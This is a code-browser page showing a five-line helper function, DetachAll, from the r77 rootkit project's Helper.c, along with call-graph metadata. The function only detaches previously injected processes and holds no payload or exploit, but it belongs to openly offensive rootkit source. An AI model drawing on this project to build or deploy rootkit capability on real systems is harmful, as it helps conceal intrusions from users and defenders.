Code
Hub
Workspaces
Following
Trending
Connect
MCP
copy
Create free account
hub
/
github.com/bytecode77/r77-rootkit
/ DetachAll
Function
DetachAll
Helper/Helper.c:113–117 ·
view source on GitHub ↗
Source
from the content-addressed store, hash-verified
111
return DetachInjectedProcessById(processId);
112
}
113
BOOL DetachAll()
114
{
115
DetachAllInjectedProcesses();
116
return TRUE;
117
}
Callers
nothing calls this directly
Calls
1
DetachAllInjectedProcesses
Function · 0.85
Tested by
no test coverage detected